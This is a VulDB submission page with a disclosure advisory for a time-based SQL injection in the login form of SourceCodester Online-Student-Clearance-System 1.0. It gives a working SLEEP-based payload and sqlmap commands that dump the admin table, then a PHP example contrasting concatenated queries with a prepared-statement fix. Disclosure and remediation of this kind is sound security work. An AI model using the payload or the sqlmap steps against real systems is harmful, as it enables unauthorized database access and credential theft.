Submission #564329: SourceCodester Online-Student-Clearance-System 1.0 SQL Injection Info

Title: SourceCodester Online-Student-Clearance-System 1.0 SQL Injection
Description: Vulnerability Summary: SQL Injection (Time Based) in Online-Student-Clearance-System

**Critical Security Advisory**

Affected System: Online-Student-Clearance-System (Version ≤1.0)
Vulnerability Type: SQL Injection (CWE-89)
Severity Level: CRITICAL (CVSS: 9.1)
Discovered By: Anuj Sharma
Vendor Homepage: https://www.sourcecodester.com/
Software Link: https://www.sourcecodester.com/php/17892/online-clearance-system.html

Core Vulnerability: Online-Student-Clearance-System concatenates unsanitized user input directly into its SQL queries, so an unauthenticated attacker can read the whole database (including the admin table) through the login form.

Vulnerable Parameter: username (form field txtusername)
Affected URL: http://localhost/student_clearance_system/Admin/login.php

Proof of Concept: Submit the following form body to login.php. The injection is carried in the username field; the password value is arbitrary:

txtusername=test ' AND (SELECT 1824 FROM (SELECT(SLEEP(5)))nyKW) AND 'amlx'='amLx&txtpassword=test

The closing quote that the application's own query appends completes the 'amLx' literal, and the injected subquery makes the database execute SLEEP(5) before it answers. A response that is delayed by about five seconds, and not delayed when SLEEP(5) is changed to SLEEP(0), confirms the time-based blind injection; no error message or data has to appear in the page.

sqlmap, an SQL injection exploitation tool, can automate the extraction. List the databases:

sqlmap -u http://localhost/student_clearance_system/Admin/login.php --dbs --batch

Then list the tables of the application database:

sqlmap -u http://localhost/student_clearance_system/Admin/login.php -D student_clearance --tables

Then dump a table, here the 'admin' table:

sqlmap -u http://localhost/student_clearance_system/Admin/login.php -D student_clearance -T admin --dump

Note that these commands as written send no form parameters. The login form's txtusername and txtpassword fields have to be handed to sqlmap (for example with --data="txtusername=test&txtpassword=test" if the form is submitted by POST, and -p txtusername to target the vulnerable field) so that it actually tests the injectable parameter. More details are provided on my GitHub page.

Mitigation:
- Immediate: use prepared statements (parameterized queries) for every query that includes user input, starting with login.php
- Short-term: add server-side input validation
- Long-term: consider migrating to an ORM framework

Disclosure Timeline:
- 0-Day → Vendor notified
- 7 Days → Public disclosure (if unpatched)

References:
- OWASP Top 10 2021: A03 Injection
- NIST SP 800-115 (Technical Guide to Information Security Testing and Assessment)
- HIPAA Security Rule §164.308(a)(5)

This vulnerability enables complete system compromise and requires emergency remediation. Organizations that have exposed this application should assume breach and conduct a forensic audit.
Source: https://github.com/cybersharmaji/Online-Student-Clearance-System/blob/main/sql_injection_time.md
User: esharmaji (UID 84358)
Submitted: 2025-04-23 05:14 PM (12 months ago)
Moderation: 2025-05-05 05:11 PM (12 days later)
Status: Accepted
VulDB entry: 307432 [SourceCodester Online Student Clearance System 1.0 /Admin/login.php id/username/password SQL Injection]
Points: 20
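The concatenation pattern the advisory describes, placed beside the prepared-statement fix it recommends, as an added PHP example written for this page (it is not the project's own login.php). It assumes a mysqli connection, an `admin` table with `username` and `password` columns, password hashes produced by password_hash(), and the POST fields txtusername and txtpassword named in the advisory; the database credentials are placeholders.

```php
<?php
// Added example for this page, not SourceCodester's code.
// Assumptions: mysqli connection, table `admin` with columns id, username,
// password (password_hash() output), POST fields txtusername/txtpassword.

// --- VULNERABLE: user input is concatenated straight into the query. ---
// With the advisory's payload in $user the query becomes
//   ... WHERE username='test ' AND (SELECT 1824 FROM (SELECT(SLEEP(5)))nyKW)
//       AND 'amlx'='amLx' AND password='test'
// The application's own closing quote completes 'amLx', the subquery calls
// SLEEP(5), and the response is delayed by five seconds.
function login_vulnerable(mysqli $conn, string $user, string $pass): ?array
{
    $sql = "SELECT id, username FROM admin"
         . " WHERE username='" . $user . "' AND password='" . $pass . "'";
    $result = $conn->query($sql);
    if ($result === false) {
        return null;
    }
    $row = $result->fetch_assoc();
    return $row ?: null;
}

// --- FIXED: prepared statement; the input is bound as data, never parsed as SQL. ---
function login_fixed(mysqli $conn, string $user, string $pass): ?array
{
    $stmt = $conn->prepare(
        "SELECT id, username, password FROM admin WHERE username = ? LIMIT 1"
    );
    if ($stmt === false) {
        return null;
    }
    // "s" = bind as a string. A value such as "test ' AND (SELECT ... SLEEP(5) ...)"
    // is compared literally against the username column; no SQL is executed from it.
    $stmt->bind_param("s", $user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() requires mysqlnd
    $stmt->close();

    // Verify the password in PHP against the stored hash, so the password
    // never reaches the SQL engine at all.
    if (!$row || !password_verify($pass, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// Request handling in the shape of the login form (placeholder credentials).
$conn = new mysqli('localhost', 'dbuser', 'dbpass', 'student_clearance');
$user = $_POST['txtusername'] ?? '';
$pass = $_POST['txtpassword'] ?? '';

$admin = login_fixed($conn, $user, $pass);
if ($admin === null) {
    http_response_code(401);
    exit('Invalid credentials');
}
session_start();
$_SESSION['admin_id'] = $admin['id'];
```

If the existing schema still stores plaintext passwords and cannot be migrated at once, bind the password as a second `?` parameter with `bind_param("ss", $user, $pass)` instead of comparing it in PHP; that already closes the injection, and the hash migration can follow. get_result() needs the mysqlnd driver; on installations without it, use bind_result() and fetch() on the statement instead.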
